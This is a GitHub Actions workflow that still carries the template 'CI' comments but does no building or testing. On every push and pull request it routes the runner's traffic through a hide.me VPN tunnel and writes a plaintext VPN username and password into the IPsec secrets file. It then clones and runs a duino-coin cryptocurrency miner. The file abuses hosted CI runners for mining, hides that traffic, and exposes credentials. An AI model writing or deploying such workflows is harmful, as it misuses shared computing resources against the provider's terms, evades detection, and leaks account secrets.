# This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:
# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  test:
   name: Subscrbeit
    # The type of runner that the job will run on
   runs-on: ubuntu-latest
   strategy:
    fail-fast: false
    matrix:
     runner: [0]
   steps:
     - run: |
        sudo su
        sudo apt-get -y install strongswan
    
        sudo apt-get -y install libcharon-extra-plugins
        sudo apt-get -y install libstrongswan-extra-plugins
        sudo printf '%s\n\t' 'conn hide-nl' 'keyexchange=ike' 'dpdaction=clear' 'dpddelay=300s' 'eap_identity=shah77pc' 'leftauth=eap-mschapv2' 'left=%defaultroute' 'leftsourceip=%config' 'right=nl.hide.me' 'rightauth=pubkey' 'rightsubnet=0.0.0.0/0' 'rightid="C=MY, L=Labuan, O=eVenture Limited, CN=*.hide.me"' 'type=tunnel' '#hide-nl' 'auto=add' >  /etc/ipsec.conf
        sudo sed -i 's/load = yes/load = no/g' /etc/strongswan.d/charon/constraints.conf
        sudo printf '%s' 'shah77pc' ' : EAP ' '137713471342aA' >> /etc/ipsec.secrets
        sudo rmdir /etc/ipsec.d/cacerts
        sudo ln -s /etc/ssl/certs /etc/ipsec.d/cacerts
        sudo ipsec restart
        sudo ipsec up hide-nl
        sudo apt update
        sudo apt install python3 python3-pip git python3-pil python3-pil.imagetk -y # Install dependencies
        git clone https://github.com/shah77pc/duino-coin
        cd duino-coin
        sudo python3 -m pip install -r requirements.txt # Install pip dependencies
        
      
        python PC_Miner.py
